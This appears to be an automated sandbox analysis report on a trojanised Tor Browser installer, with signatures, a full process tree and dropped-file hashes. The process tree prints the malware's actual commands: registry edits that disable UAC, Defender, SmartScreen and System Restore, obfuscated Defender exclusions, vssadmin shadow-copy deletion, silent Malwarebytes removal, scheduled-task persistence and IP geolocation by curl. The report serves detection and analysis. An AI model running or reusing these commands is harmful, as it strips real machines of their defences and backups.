Analysis
-
max time kernel
212s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
26-11-2022 15:44
General
-
Target
torbrowser-install-win64-11.5.8_en-US.exe
-
Size
271.0MB
-
MD5
c9bdfd2d99730f4969b16daa7b55f09c
-
SHA1
d7a3f9e0df14aa53336271f6a80a6a968f52305e
-
SHA256
16f47df2e331c8f70920ffc50ed2c14a53b4079cb989028b0900ce7ef18bd623
-
SHA512
9fcf9d5de9ce7d2e054a122c5790713e106dadf58eaa6bfe6049a25adae9966c0efde9ba1db3a61b312e000e1bb2acaaeca4f07266b921c148a2e8cf91c1ed12
-
SSDEEP
196608:ziJQ0v+cIuxunU9+MJQBGqVUE8Fx0hw35EyN3PN8Cg7Hr0EE2xsJ12QX6Y:ZolunU9XJQBqEwd35Eg3PNgHjEsq
Malware Config
Signatures
-
Modifies Windows Defender notification settings 3 TTPs 3 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Windows security bypass 2 TTPs 8 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 16 IoCs
-
Possible privilege escalation attempt 5 IoCs
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 11 IoCs
-
Modifies file permissions 1 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 12 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-GTUBL.tmp\torbrowser-install-win64-11.5.8_en-US.tmp"C:\Users\Admin\AppData\Local\Temp\is-GTUBL.tmp\torbrowser-install-win64-11.5.8_en-US.tmp" /SL5="$9012C,10650007,160256,C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe"C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe" /verysilent /sp-3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-A16Q8.tmp\torbrowser-install-win64-11.5.8_en-US.tmp"C:\Users\Admin\AppData\Local\Temp\is-A16Q8.tmp\torbrowser-install-win64-11.5.8_en-US.tmp" /SL5="$A012C,10650007,160256,C:\Users\Admin\AppData\Local\Temp\torbrowser-install-win64-11.5.8_en-US.exe" /verysilent /sp-4⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\.cmd"5⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f6⤵
- UAC bypass
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f6⤵
- UAC bypass
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f6⤵
- UAC bypass
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\system32\smartscreen.exe" /a6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /reset6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im smartscreen.exe /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-186⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\reg.exereg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f6⤵
- Modifies Windows Defender notification settings
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f6⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Program Files (x86)\malwarebytes\anti-malware\mbuns.exe" /uninstall /verysilent /f6⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\.cmd""5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exer.exe /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /TI/ /SW:0 reG.eXe add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.eXe"C:\Windows\system32\reG.eXe" add "hKLM\SOftWare\mICrosOFT\WIndowS deFender\eXclUsiONs\extensIons" /v Scr /t reG_dwOrd /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exer.exe /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /TI/ /SW:0 reg.eXe Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" Add "hKLm\softWare\MicroSOFt\WiNdOWS deFeNder\eXCLuSIons\eXteNsiONS" /v CMd /T reg_dword /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exer.eXe /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" add "hKlM\soFTWAre\MiCrosofT\WINdoWS defeNder\eXClUSIONs\eXTeNsIonS" /V exe /t reg_dWord /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exer.eXe /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" Add "hKLM\sOftWare\mICrosofT\WINdOWS defender\excluSIoNs\PAThs" /V "C:\Windows\SYsTeM32\driVers\etC\hoSts" /t "reg_dwOrd" /d "0" /F9⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\.cmd""5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country6⤵
-
C:\Windows\SysWOW64\attrib.exeattrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vBs6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattriB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cMD6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\d.cmd""5⤵
- Deletes itself
-
C:\tmp\obs64.scr"C:\tmp\obs64.scr"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\tmp\obs64.sCr"C:\tmp\obs64.sCr"6⤵
- Executes dropped EXE
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {71D2E07E-55A3-4CFE-88F4-56BAC0F5AEA0} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs" "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmd"2⤵
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20221126165007.log C:\Windows\Logs\CBS\CbsPersist_20221126165007.cab1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Hidden Files and Directories
2Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\d.cmdFilesize
196B
MD5e52c42323920454d3917100c0a955645
SHA100b5973b8f5a1cdb428addf063c74433bd309417
SHA2561a1008b1bf089cc34c094151f2768eb4889f674f2d84feb9cefa1a22f9cd4749
SHA512fd2b77203c53ca1a96ce12f44f15629297661ad5103f34ae2a34b9f3bd3c895f7330e859054cfdcfba3a324c1f393659d3525e021121940812bffa668c11c593
-
C:\Users\Admin\AppData\Local\Temp\is-A16Q8.tmp\torbrowser-install-win64-11.5.8_en-US.tmpFilesize
1.4MB
MD5f91cacafae0f74891c7ed426567d83d3
SHA1edc7b0b92fc96f7d984ae912dec615c3339ac5de
SHA2563cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7
SHA512a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91
-
C:\Users\Admin\AppData\Local\Temp\is-GTUBL.tmp\torbrowser-install-win64-11.5.8_en-US.tmpFilesize
1.4MB
MD5f91cacafae0f74891c7ed426567d83d3
SHA1edc7b0b92fc96f7d984ae912dec615c3339ac5de
SHA2563cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7
SHA512a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\.cmdFilesize
28KB
MD508fd334038ebed665c2fb2bcec5456f1
SHA105847a3d0fcf514c313e474c212d80f2561143cd
SHA2563aed89b804bc9bf676fbf9a3bcc246ad5c18b3060d004ab8d5fa7a2d1274d8ae
SHA512fa5f5f8f5ee3c68e91ffdd69b4bcf3751ecda78cff1d54ad31df83994c6f5281893c2fb61ca7202bf7f3df6bfad5b4344b9710cac6943de17c04fac59d94703a
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\.cmdFilesize
966B
MD5c06a8b85b2df537dbada97878b34c468
SHA1fef562e98693763fd96624d5614bece1381dab42
SHA2566b070e91c3e66ee44dded328e67ae453e311d4614e7a6c985a6b3ed62ca0b9ad
SHA51227c6db4eff748543cf3a8ad87b0ac8f040fb3447be021b6b8b62133aa2b22d2511fc7c7810b27c30870c4a638f8e2cb4f815f430dd0c705e47c0aacee8cbe42c
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\.cmdFilesize
678B
MD5efe1deac1b6d60d177fc1f95d9827336
SHA1155ec2c342fb92bd1f878031e5bb6c4006b4aa10
SHA2561932ec1c8242c0aefe0dc3694ff7ddd4a05db885bee56f8ceb8739fc45e109a0
SHA512d5c288ed6c57172ae366b0559e8f83c6fa97409af257211f3d5052b1ef4ba9780a7eee7c116b328ed60fc1330c8a938259daabb1e62fec8c75d63f3d91cc0b6a
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
SHA1e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA2564c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA5124dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0
-
C:\Users\Admin\AppData\Local\Temp\is-SA6J7.tmp\temp\r.exeFilesize
764KB
MD5408dd6ade80f2ebbc2e5470a1fb506f1
